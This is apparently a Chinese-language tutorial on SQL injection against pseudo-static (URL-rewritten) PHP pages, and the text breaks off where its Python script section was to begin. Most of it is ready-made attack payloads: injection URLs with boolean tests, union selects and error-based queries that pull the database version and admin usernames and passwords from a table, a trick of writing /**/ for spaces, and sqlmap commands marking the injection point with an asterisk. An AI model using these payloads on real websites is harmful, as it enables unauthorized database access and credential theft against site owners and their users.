PHP针对伪静态的注入总结【附asp与Python相关代码】

二、手工注入法

1.http://www.xxx.com/play/Diablo.html http://www.xxx.com/down/html/?772.html

2.测试注入：

http://www.xxx.com/down/html/?772′.html http://www.xxx.com /play/Diablo'.html http://www.xxx.com/play/Diablo'/**/and /**/1='1 /*.html http://www.xxx.com/play/Diablo' /**/and /**/1='2 /*.html http://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html 正常 http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html 出错

3.看页面是否存在差异，相同则不存在，不同存在注入。

4.联合查询：

http://www.xxx.com/play/diablo' and 1=2 union select 1,2… frominformation_schema.columns where 1='1.html http://www.xxx.com/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html

手工注入法（二）

http://www.xxx.net/news/html/?410.html http://www.xxx.net/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),0x3a,(select/**/concat(user,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html

注：

伪静态的注入和URL的普通GET注入不太相同

。普通url的get注入的%20,%23,+等都可以用；但是伪静态不行，会被直接传递到到url中，所以用/**/这个注释符号表示空格。

三、SQLmap方法

在sqlmap中伪静态哪儿存在注入点就加* http://www.cunlide.com/id1/1/id2/2 python sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″ http://www.xxx.com/news/class/?103.htm python sqlmap.py -u “http://www.xxx.com/news/class/?103*.html”

四、python脚本方法

代码：